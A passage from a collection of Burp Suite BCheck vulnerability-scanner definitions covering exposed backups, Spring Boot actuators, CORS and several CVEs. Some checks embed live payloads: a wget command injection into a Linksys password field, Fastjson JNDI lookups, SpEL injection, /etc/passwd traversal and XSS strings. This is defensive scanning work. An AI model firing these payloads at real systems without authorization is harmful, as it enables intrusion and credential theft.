{check.response.status_code} is "200" 19 | and "\"node\":" in {check.response.body} 20 | and "\"key\":" in {check.response.body} 21 | and "application/json" in {check.response.headers} then 22 | report issue: 23 | severity: high 24 | confidence: certain 25 | detail: "A Kubernetes etcd server cluster secrets and configurations files are accessible." 26 | remediation: "Implement the following remediation https://etcd.io/docs/v2.3/authentication/" 27 | end if -------------------------------------------------------------------------------- /other/WebBackup Exposed.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "WebBackup Exposed" 4 | description: "The website has detected a backup file leak." 5 | author: "JaveleyQAQ" 6 | tags: "Leak", "Exposed" 7 | 8 | run for each: 9 | url_array = 10 | `/{base.request.url.host}.bak`, 11 | `/{base.request.url.host}.rar`, 12 | `/{base.request.url.host}.zip`, 13 | "/web.rar", 14 | "/web.zip", 15 | "/wwwroot.rar", 16 | "/wwwroot.zip", 17 | "/data.bak", 18 | "/db.rar", 19 | "/db.zip", 20 | "/db.bak", 21 | "/backup.zip" 22 | 23 | 24 | given host then 25 | send request called check: 26 | method: "GET" 27 | path: {url_array} 28 | 29 | if {check.response.status_code} is "200" and ("application/zip" in {check.response.headers} or "application/x-rar-compressed" in {check.response.headers} or "application/octet-stream" in {check.response.headers}) then 30 | report issue: 31 | severity: high 32 | confidence: tentative 33 | detail: "The website has detected a backup file leak. Please perform a manual inspection." 34 | remediation: "none" 35 | end if 36 | -------------------------------------------------------------------------------- /other/springboot/Springboot metrics actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot metrics actuator" 4 | description: "Springboot metrics actuator may expose sensitive information" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/actuator/metrics", 11 | "/actuator/prometheus" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "mem" in {check.response.body} 20 | and "mem.free" in {check.response.body} 21 | and "processors" in {check.response.body} 22 | and "instance.uptime" in {check.response.body} 23 | and "text/plain" in {check.response.headers} then 24 | report issue: 25 | severity: low 26 | confidence: certain 27 | detail: `Springboot metrics actuator found at {potential_path}.` 28 | remediation: "Ensure metrics is not exposed or doesn't contain sensitive information." 29 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2019-17662 - ThinVNC 10b1 - Auth Bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2019-17662 - ThinVNC 1.0b1 - Auth Bypass" 4 | description: "Checks for CVE-2019-17662" 5 | author: "Dolph Flynn" 6 | tags: "CVE-2019-17662", "thinvnc", "auth-bypass" 7 | 8 | 9 | given host then 10 | send request called check: 11 | `GET /{random_str(17)}/../../ThinVnc.ini HTTP/1.1 12 | Host: {base.request.url.host} 13 | Accept-Encoding: gzip, deflate 14 | Accept: */* 15 | Accept-Language: en-US;q=0.9,en;q=0.8 16 | User-Agent: {user_agent} 17 | Connection: close 18 | Cache-Control: max-age=0 19 | 20 | ` 21 | 22 | if {check.response.status_code} is "200" 23 | and {check.response.headers} matches "application/binary" 24 | and {check.response.body} matches "\bUser=\b" 25 | and {check.response.body} matches "\bPassword=\b" then 26 | 27 | report issue: 28 | severity: high 29 | confidence: tentative 30 | detail: "ThinVNC 1.0b1 - Authentication Bypass." 31 | end if 32 | -------------------------------------------------------------------------------- /other/Kubernetes_Pods_API_Discovery_&_Remote_Code_Execution.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Kubernetes Pods - API Discovery & Remote Code Execution" 4 | author: "Parimal Shaw" 5 | description: "A Kubernetes Pods API was discovered. When the service port is available, unauthenticated users can execute commands inside the container." 6 | tags: "Kubernetes Misconfiguration" 7 | 8 | 9 | run for each: 10 | potential_path = 11 | "/pods", 12 | "/api/v1/pods" 13 | 14 | 15 | given host then 16 | send request called check: 17 | method: "GET" 18 | path: {potential_path} 19 | 20 | 21 | if {check.response.status_code} is "200" 22 | and "apiVersion" in {check.response.body} 23 | and "application/json" in {check.response.headers} then 24 | report issue: 25 | severity: high 26 | confidence: certain 27 | detail: "A Kubernetes Pods API was discovered. When the service port is available, unauthenticated users can execute commands inside the container." 28 | remediation: "Ensure to Disable access to following instances in Kubernetes." 29 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-29298 Adobe ColdFusion Access Control Bypass.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2023-29298 Adobe ColdFusion Access Control Bypass" 4 | description: "Checks for CVE-2023-29298" 5 | author: "Ollie Whitehouse" 6 | tags: "CVE-2023-29298 CVE ColdFusion" 7 | 8 | # Details of the vulnerability can be found in https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/ 9 | define: 10 | potential_path = 11 | "//CFIDE/administrator/index.cfm" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | # Checks that we get a 200 AND that the output we expect in the result 19 | if {check.response.status_code} is "200" and "ColdFusion" in {check.response.body} then 20 | report issue: 21 | severity: high 22 | confidence: certain 23 | detail: "Host is vulnerable to the access control bypass vulnerability CVE-2023-29298" 24 | remediation: "See Adobe's APSB23-40 Security Bulletin - CF2018 Update 17, CF2021 Update 7, and CF2023 GA build for patched version" 25 | end if 26 | -------------------------------------------------------------------------------- /vulnerability-classes/injection/Spring4Shell.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Spring4Shell (Response)" 4 | description: "Checks for the Spring4Shell vulnerability" 5 | author: "Giriraj R (cipherlover)" 6 | tags: "Srping4Shell", "CVE-2022-22965", "cve" 7 | 8 | define: 9 | spring4shell_payload = `class.module.classLoader.URLs%5B0%5D=0` 10 | issueDetail = `The server has returned a response status code as "400" and along with "java.lang.IllegalArgumentException" error on the response body denoting that there is possibility for Spring4shell vulnerability` 11 | issueRemediation = "Make sure you are up to date with patches and follow the remediation steps for CVE-2022-22965." 12 | 13 | given request then 14 | send request called check : 15 | appending queries: `{spring4shell_payload}` 16 | 17 | if {check.response.status_code} is "400" and "java.lang.IllegalArgumentException" in {check.response.body} then 18 | report issue: 19 | severity: high 20 | confidence: firm 21 | detail: `{issueDetail}` 22 | remediation: `{issueRemediation}` 23 | end if 24 | 25 | -------------------------------------------------------------------------------- /other/GraphQL/grapple-get-method.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "GraphQL CSRF GET / Method Enabled" 4 | description: "Cross Site Request Forgery happens when an external website gains ability to make API calls impersonating an user if he visits the website while being authenticated to your API. 5 | Allowing API calls through GET requests can lead to CSRF attacks, because cookies are added automatically to GET requests by the browser." 6 | author: "Dolev Farhi" 7 | 8 | run for each: 9 | potential_path = 10 | "/graphql?query={__typename}", 11 | "/api/graphql?query={__typename}" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if "query" in {check.response.body} and "data" in {check.response.body} and "__typename" in {check.response.body} and "application/json" in {check.response.headers} then 19 | report issue: 20 | severity: info 21 | confidence: certain 22 | detail: `GraphQL CSRF GET Method enabled on {potential_path}.` 23 | remediation: "Disable GET Method" 24 | end if 25 | -------------------------------------------------------------------------------- /other/files/Interesting-file-error-in-the-response.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Interesting file error in the response" 4 | description: "Interesting file error in the response" 5 | author: "Andrej Šimko @ Accenture" 6 | tags: "file", "error", "passive" 7 | 8 | #note that in time, when BChecks will support tuples I will rewrite this rule to be prettier 9 | given response then 10 | if {latest.response.body} matches "(The system cannot find the path specified|No such file or directory|Cannot read file|Path not found|Disk full|Illegal file name|Unable to create directory|Directory not empty|Input/output error|Cannot find the device specified|Is a directory|Resource temporarily unavailable|File exists|Read-only file system|Filename too long|Too many open files|Failed to mount filesystem|Extension point not found|Unsupported extension)" then 11 | report issue: 12 | severity: info 13 | confidence: tentative 14 | detail: "Investigate the response if you have not stumbled upon a file operation which could be used to obtain RCE, or used to rewrite some files on the server." 15 | end if 16 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2020-35713 - Belkin Linksys RE6500 10012001 - RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "CVE-2020-35713 - Belkin Linksys RE6500 <1.0.012.001 - RCE" 4 | description: "Checks for CVE-2020-35713" 5 | author: "Dolph Flynn" 6 | tags: "CVE-2020-35713", "RCE", "belkin", "linksys", "OAST" 7 | 8 | 9 | given host then 10 | send request called check: 11 | `POST /goform/setSysAdm HTTP/1.1 12 | Host: {base.request.url.host} 13 | User-Agent: {user_agent} 14 | Connection: close 15 | Accept-Encoding: gzip, deflate, br 16 | Accept: */* 17 | Accept-Language: en-US;q=0.9,en;q=0.8 18 | Origin: {base.request.url} 19 | Referer: {base.request.url}/login.shtml 20 | 21 | admuser=admin&admpass=;wget http://{generate_collaborator_address()};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1` 22 | 23 | if http interactions then 24 | 25 | report issue: 26 | severity: high 27 | confidence: tentative 28 | detail: "Belkin Linksys RE6500 <1.0.012.001 - Remote Command Execution." 29 | end if 30 | 31 | 32 | -------------------------------------------------------------------------------- /other/Cache Deception check (Path confusion).bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Cache Deception check (Path confusion)" 4 | description: "Check for misconfiguration while routing .css, .js, .png files" 5 | author: "Sergey Kolesnikov (tr3harder) " 6 | 7 | run for each: 8 | potential_path = 9 | `/{random_str(17)}.css`, 10 | `/{random_str(17)}.js`, 11 | `/{random_str(17)}.png`, 12 | `{random_str(17)}.css`, 13 | `{random_str(17)}.js`, 14 | `{random_str(17)}.png` 15 | 16 | given request then 17 | if {base.response.status_code} is "200" then 18 | send request called check: 19 | appending path: {potential_path} 20 | 21 | 22 | if {check.response.status_code} is "200" 23 | and {base.response.body} is {check.response.body} then 24 | report issue: 25 | severity: medium 26 | confidence: certain 27 | detail: `Cache deception misconfiguration was probably found while routing .css, .js, .png files. More detailed: https://book.hacktricks.xyz/pentesting-web/cache-deception#cache-deception` 28 | remediation: "Correctly configure rules to route certain filetypes" 29 | end if 30 | end if 31 | -------------------------------------------------------------------------------- /examples/exposed-backup-file.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Path-level" 4 | description: "Tests for exposed backup files" 5 | author: "Carlos Montoya" 6 | 7 | run for each: 8 | # you could add more values to this list to make the check repeat 9 | extension = ".bak", ".back", ".backup", ".old" 10 | 11 | given path then 12 | if not({base.response.status_code} is "404") then 13 | send request called check: 14 | replacing path: {regex_replace({base.response.url.path}, "(.)/?$", `$1{extension}`)} 15 | 16 | if {check.response.status_code} is {base.response.status_code} then 17 | send request called garbage: 18 | replacing path: {regex_replace({base.response.url.path}, "(.)/?$", `$1.{random_str(10)}`)} 19 | 20 | if {garbage} differs from {check} then 21 | report issue and continue: 22 | severity: info 23 | confidence: firm 24 | detail: `Backup file found at {check.request.url}` 25 | remediation: "Ensure your backup files are not exposed." 26 | end if 27 | end if 28 | end if 29 | -------------------------------------------------------------------------------- /other/corsCredentialedRequestsMisconfiguration.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v2-beta 3 | name: "Invalid CORS configuration for credentialed requests detected" 4 | description: "Checks for a broken CORS configuration case: Credentialed requests and wildcards." 5 | author: "Dominique Righetto" 6 | tags: "passive", "informative" 7 | 8 | # The server must not specify the "*" wildcard for the Access-Control-Allow-Origin response-header value, but must instead specify an explicit origin 9 | # Source: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#requests_with_credentials 10 | given response then 11 | if {latest.response.headers} matches "(?i)Access-Control-Allow-Origin:\s+\*" and 12 | {latest.response.headers} matches "(?i)Access-Control-Allow-Credentials:\s+true" then 13 | report issue: 14 | severity: info 15 | confidence: firm 16 | detail: "Credentialed CORS requests cannot used wildcards origins." 17 | remediation: "Specify an explicit allow origin. Refer to the Mozilla CORS documentation for technical details: https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#requests_with_credentials" 18 | end if -------------------------------------------------------------------------------- /other/fastjson/Fastjson-1.2.68-Deserialization-RCE.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Fastjson 1.2.68 Deserialization RCE" 4 | description: "https://paper.seebug.org/1192/" 5 | author: "Javeley" 6 | tags: "Fastjson", "Deserialization","RCE","Alibaba" 7 | 8 | run for each: 9 | payload = 10 | `\{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`, 11 | `\{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://{generate_collaborator_address()}/{random_str(4)}"}`, 12 | `\{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://{generate_collaborator_address()}/{random_str(4)}"}` 13 | 14 | given request then 15 | if {base.request.body} matches "^[{]" and "application/json" in {base.request.headers} then 16 | send request: 17 | body: {payload} 18 | 19 | if dns interactions then 20 | report issue: 21 | severity: high 22 | confidence: certain 23 | detail: "https://paper.seebug.org/1192/." 24 | remediation: "https://paper.seebug.org/1192/." 25 | end if 26 | end if 27 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-39141 Aria2 WebUI - Path Traversal.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2023-39141 Aria2 WebUI - Path Traversal" 4 | description: "Check for CVE-2023-39141" 5 | author: "Joao Paulo Assis (j0hnZ3RA)" 6 | tags: "CVE-2023-39141","lfi","unauth","aria2","webui" 7 | 8 | define: 9 | base_path = "/" 10 | potential_path = "/../../../../../../../../../../../../../../../../../../../../etc/passwd" 11 | 12 | given host then 13 | send request called check1: 14 | method: "GET" 15 | path: {base_path} 16 | 17 | if "Aria2 WebUI" in {check1.response.body} then 18 | send request called check2: 19 | method: "GET" 20 | path: {potential_path} 21 | 22 | if {check2.response.status_code} is "200" and "root" in {check2.response.body} then 23 | report issue: 24 | severity: high 25 | confidence: certain 26 | detail: "webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability." 27 | remediation: "Upgrade to the latest version of Aria2 WebUI to fix the path traversal vulnerability." 28 | end if 29 | 30 | end if 31 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2023-36346 POS Codekop v2.0 - Cross-site Scripting" 4 | author: "Parimal Shaw" 5 | description: "Checks for CVE-2023-36346" 6 | tags: "CVE-2023-36346" 7 | 8 | define: 9 | potential_path = "/print.php?nm_member=" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | 17 | if {check.response.status_code} is "200" and "" in {check.response.body} and "print" in {check.response.body} and "text/html" in {check.response.headers} then 18 | report issue: 19 | severity: medium 20 | confidence: certain 21 | detail: "POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php." 22 | remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user." 23 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE_2021_21816_D_Link_DIR_3040_1_13B03_Information_Disclosure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2021-21816 D-Link DIR-3040 1.13B03 - Information Disclosure" 4 | author: "Parimal Shaw" 5 | description: "Check For CVE-2021-21816" 6 | tags: "CVE-2021-21816" 7 | 8 | define: 9 | potential_path = "/messages" 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | 18 | if {check.response.status_code} is "200" 19 | and "syslog:" in {check.response.body} 20 | and "admin" in {check.response.body} 21 | and "/etc_ro/lighttpd/www" in {check.response.body} then 22 | report issue: 23 | severity: medium 24 | confidence: certain 25 | detail: "D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations." 26 | remediation: "Proper Access Control should be implemented." 27 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot caches actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot caches actuator" 4 | description: "Springboot caches actuator exposed" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/caches", 11 | "/actuator/caches" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"cacheManagers\"" in {check.response.body} 20 | and ("application/json" in {check.response.headers} 21 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 25 | report issue: 26 | severity: low 27 | confidence: certain 28 | detail: `Springboot info caches found at {potential_path}.` 29 | remediation: "Ensure info caches is not exposed." 30 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE_2021_20114_TCExam_Gt_14_8_1_Sensitive_Information_Exposure.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2021-20114 TCExam <= 14.8.1 - Sensitive Information Exposure" 4 | author: "Parimal Shaw" 5 | description: "Check for CVE-2021-20114" 6 | tags: "CVE-2021-20114" 7 | 8 | define: 9 | potential_path = "/cache/backup/" 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: {potential_path} 16 | 17 | 18 | if {check.response.status_code} is "200" and "Index of /cache/backup" in {check.response.body} and "Parent Directory" in {check.response.body} and ".sql.gz" in {check.response.body} then 19 | report issue: 20 | severity: high 21 | confidence: certain 22 | detail: "When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files. Among other things, these backup files contain usernames, password hashes and other user information that was supplied on signup." 23 | remediation: "It is Recommended to Upgrade to latest version or disable directory listing." 24 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2023-46805-Ivanti Auth Bypass.bcheck: -------------------------------------------------------------------------------- 1 | # https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/ 2 | # https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis 3 | 4 | metadata: 5 | language: v2-beta 6 | name: "CVE-2023-46805 - Ivanti Connect Secure and Ivanti Policy Secure Authentication Bypass" 7 | description: "Checks for CVE-2023-46805" 8 | author: "trikster" 9 | tags: "CVE-2023-46805", "cve", "auth-bypass", "ivanti" 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | path: "/api/v1/totp/user-backup-code/../../system/system-information" 16 | 17 | if {check.response.status_code} is "200" and 18 | "Content-Type: application/json" in {check.response.headers} and 19 | {check.response.body} matches "(?m)\s*\{\s*\"software-inventory\"\s*:\s*\{\s*\"software\"\s*:\s*\{\s*\"name\"\s*:\s*\"\w+\"" then 20 | 21 | report issue: 22 | severity: high 23 | confidence: firm 24 | detail: "Application appears to be vulnerable to CVE-2023-46805." 25 | remediation: "Apply vendor patches." 26 | 27 | end if 28 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2018-20824 - Atlassian Jira WallboardServlet Cross Site Scripting.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting" 4 | description: "The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the cyclePeriod parameter." 5 | author: "mrrootsec" 6 | tags: "xss", "cve", "jira" 7 | 8 | run for each: 9 | potential_path = "/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)" 10 | 11 | given request then 12 | send request called jxss: 13 | path: {potential_path} 14 | method: "GET" 15 | 16 | if {jxss.response.status_code} is "200" and "timeout: alert(document.domain)" in {jxss.response.body} then 17 | report issue: 18 | severity: medium 19 | confidence: certain 20 | detail: "Vulnerable to CVE-2018-20824 - The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter." 21 | remediation: "Upgrade Jira to the latest version" 22 | end if 23 | -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE_2022_0150_WordPress_Accessibility_Helper_Lt_0_6_0_7_Cross_Site.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2022-0150 WordPress Accessibility Helper <0.6.0.7 - Cross-Site Scripting" 4 | author: "Parimal Shaw" 5 | description: "Check for CVE-2022-0150." 6 | tags: "CVE-2022-0150" 7 | 8 | define: 9 | potential_path = "/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v" 10 | 11 | given host then 12 | send request called check: 13 | method: "GET" 14 | path: {potential_path} 15 | 16 | if {check.response.status_code} is "200" and "var wah_target_src = '';alert(document.domain);//';" in {check.response.body} and "text/html" in {check.response.headers} then 17 | report issue: 18 | severity: medium 19 | confidence: certain 20 | detail: "WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page." 21 | remediation: "Upgrade to Latest Version or validate all the input data, make sure that only the allowlisted data is allowed, and ensure that all variable output in a page is encoded before it is returned to the user." 22 | end if -------------------------------------------------------------------------------- /other/springboot/Springboot info actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot info actuator" 4 | description: "Springboot info actuator exposed" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/info", 11 | "/actuator/info" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"name\"" in {check.response.body} 20 | and "\"version\"" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot info actuator found at {potential_path}.` 30 | remediation: "Ensure info actuator is not exposed." 31 | end if -------------------------------------------------------------------------------- /other/Cloudflare External Image Resizing Misconfiguration.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Cloudflare External Image Resizing Misconfiguration" 4 | author: "Parimal Shaw" 5 | description: "Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin." 6 | tags: "Cloudflare Misconfiguration" 7 | 8 | define: 9 | potential_path = `/cdn-cgi/image/width/https://{generate_collaborator_address()}` 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "GET" 15 | replacing headers: 16 | "Accept": "*/*" 17 | path: {potential_path} 18 | 19 | 20 | if http interactions then 21 | report issue: 22 | severity: info 23 | confidence: certain 24 | detail: "Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin." 25 | remediation: "Disable image Resizing from all origin or restrict it to certain doamins in Cloudflare." 26 | end if -------------------------------------------------------------------------------- /other/Rails CRLF and XSS.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Ruby on Rails - CRLF Injection and Cross-Site Scripting" 4 | author: "Parimal Shaw" 5 | description: "Ruby on Rails 6.0.0-6.0.3.1 contains a CRLF issue which allows JavaScript to be injected into the response, resulting in cross-site scripting." 6 | tags: "Rails CRLF and XSS" 7 | 8 | define: 9 | potential_path = "/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa" 10 | 11 | 12 | given host then 13 | send request called check: 14 | method: "POST" 15 | path: {potential_path} 16 | 17 | 18 | if {check.response.status_code} is "302" and "javascript:alert(1)" in {check.response.body} and "Location: aaaaa" in {check.response.headers} and "text/html" in {check.response.headers} then 19 | report issue: 20 | severity: medium 21 | confidence: certain 22 | detail: `Ruby on Rails 6.0.0-6.0.3.1 contains a CRLF issue which allows JavaScript to be injected into the response, resulting in cross-site scripting.` 23 | remediation: "Ensure the location value is set as default value and XSS,CRLF payloads should be Blocked by application" 24 | end if -------------------------------------------------------------------------------- /other/exposed-laravel-clockwork.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Exposed Laravel Clockwork Endpoint" 4 | description: "A Laravel Clockwork php dev tools was discovered, which exposed cleartext HTTP request, responses, passwords, tokens and some information containing app secrets. " 5 | author: "Yasin Yilmaz" 6 | tags: "laravel", "clockwork", "php" 7 | 8 | run for each: 9 | potential_path = 10 | "/__clockwork/latest", 11 | "/_debugbar/clockwork/latest", 12 | "/public/clockwork/latest", 13 | "/public/__clockwork/latest" 14 | 15 | given host then 16 | send request called check: 17 | method: "GET" 18 | path: {potential_path} 19 | 20 | if {check.response.status_code} is "200" and "jobQueue" in {check.response.body} or "xdebug" in {check.response.body} or "webVitals" in {check.response.body} then 21 | report issue: 22 | severity: high 23 | confidence: firm 24 | detail: `A Laravel Clockwork php dev tools was discovered at {potential_path}, which exposed cleartext HTTP request, responses, passwords, tokens and some information containing app secrets.` 25 | remediation: "The instance of Laravel Clockwork should be restricted." 26 | end if 27 | -------------------------------------------------------------------------------- /other/springboot/Springboot health actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot health actuator" 4 | description: "Springboot health actuator exposed" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/health", 11 | "/actuator/health" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"status\"" in {check.response.body} 20 | and "\"diskSpace\"" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot health actuator found at {potential_path}.` 30 | remediation: "Ensure health actuator is not exposed." 31 | end if -------------------------------------------------------------------------------- /vulnerabilities-CVEd/CVE-2017-4971-spring_webflow_rce.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "CVE-2017-4971 Spring WebFlow RCE" 4 | description: "Spring WebFlow RCE CVE-2017-4971" 5 | author: "timeshatter" 6 | tags: "Spring WebFlow","CVE-2017-497" 7 | 8 | define: 9 | payload="&_T(org.springframework.web.context.request.RequestContextHolder).getRequestAttributes().getResponse().addHeader(\"vuln\",\"True\").aaa=aaa" 10 | answer="vuln: True" 11 | 12 | given request then 13 | send request called check1: 14 | method:"GET" 15 | appending queries:{payload} 16 | 17 | if {answer} in {check1.response} then 18 | report issue: 19 | severity: high 20 | confidence: certain 21 | detail: "find Spring WebFlow RCE CVE-2017-4971" 22 | remediation: "update Spring WebFlow to last." 23 | end if 24 | 25 | send request called check2: 26 | method:"POST" 27 | appending body:{payload} 28 | 29 | if {answer} in {check2.response} then 30 | report issue: 31 | severity: high 32 | confidence: certain 33 | detail: "find Spring WebFlow RCE CVE-2017-4971" 34 | remediation: "update Spring WebFlow to last." 35 | end if 36 | -------------------------------------------------------------------------------- /other/springboot/Springboot loggers actuator.bcheck: -------------------------------------------------------------------------------- 1 | metadata: 2 | language: v1-beta 3 | name: "Springboot loggers actuator" 4 | description: "Springboot loggers actuator exposed" 5 | author: "Mateusz Dabrowski (dbrwsky)" 6 | tags: "actuator", "springboot", "exposure", "informative" 7 | 8 | run for each: 9 | potential_path = 10 | "/loggers", 11 | "/actuator/loggers" 12 | 13 | given host then 14 | send request called check: 15 | method: "GET" 16 | path: {potential_path} 17 | 18 | if {check.response.status_code} is "200" 19 | and "\"loggers\"" in {check.response.body} 20 | and "\"levels\"" in {check.response.body} 21 | and ("application/json" in {check.response.headers} 22 | or "application/vnd.spring-boot.actuator" in {check.response.headers} 23 | or "application/vnd.spring-boot.actuator.v1+json" in {check.response.headers} 24 | or "application/vnd.spring-boot.actuator.v2+json" in {check.response.headers} 25 | or "application/vnd.spring-boot.actuator.v3+json" in {check.response.headers}) then 26 | report issue: 27 | severity: low 28 | confidence: certain 29 | detail: `Springboot loggers actuator found at 